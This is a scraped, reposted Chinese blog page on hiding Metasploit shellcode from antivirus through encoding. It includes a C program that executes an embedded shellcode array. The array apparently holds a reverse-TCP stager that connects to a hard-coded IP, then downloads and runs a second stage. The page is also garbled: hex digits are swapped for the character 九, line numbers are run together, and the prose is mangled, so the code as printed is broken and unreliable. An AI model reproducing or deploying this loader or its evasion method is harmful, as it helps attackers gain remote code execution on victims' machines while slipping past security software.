|
|
|
联系客服020-83701501

encode msf shellcode绕过杀毒

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
encode msf shellcode绕过杀毒

很多时候,杀毒软件杀我们的payload.很多时候,我们用了ENCODE或者或许间接躲过杀软。

可是随着人愈来愈多的操作,这种法子曾经慢慢的不克不及惬意了,畴昔有人说shellcode里有0x00是不克不及操作。


可是在一些环境下还是或者或许操作的。我试过10个WEBSHELL,一半是能用的。可是别的一半为什么不克不及用我一直没弄清楚明明。


代码 以下

Default
12345678九1011121314151617181九2021222324252627282九30 #include <windows.h>#include <stdio.h> unsigned char shellcode[] = "\xfc\xe8\x8九\x00\x00\x00\x60\x8九\xe5\x31\xd2\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2""\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85""\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3""\x3c\x4九\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d""\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58""\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b""\x04\x8b\x01\xd0\x8九\x44\x24\x24\x5b\x5b\x61\x5九\x5a\x51\xff""\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68""\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x九0\x01""\x00\x00\x2九\xc4\x54\x50\x68\x2九\x80\x6b\x00\xff\xd5\x50\x50""\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x九7\x6a""\x05\x68\x76\x26\x4a\x0a\x68\x02\x00\x00\x50\x8九\xe6\x6a\x10""\x56\x57\x68\x九9\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e""\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56""\x57\x68\x02\xd九\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10""\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x九3\x53\x6a""\x00\x56\x53\x57\x68\x02\xd九\xc8\x5f\xff\xd5\x01\xc3\x2九\xc6""\x85\xf6\x75\xec\xc3"; int main(){        ((void(*)(void))&shellcode)();        return 0;}

 

操作法子都知道,或者用encode将shellcode变形。


这无疑也是一种法子。


本身也还或者用C继续写,将shellcode在继续编码。

msf1

 

 

 

msf2

相关文章举荐:《那些年一路绕过的杀软》《好免杀,hyperion造》

via[wangzi@九0sec]

数安新闻+更多

证书相关+更多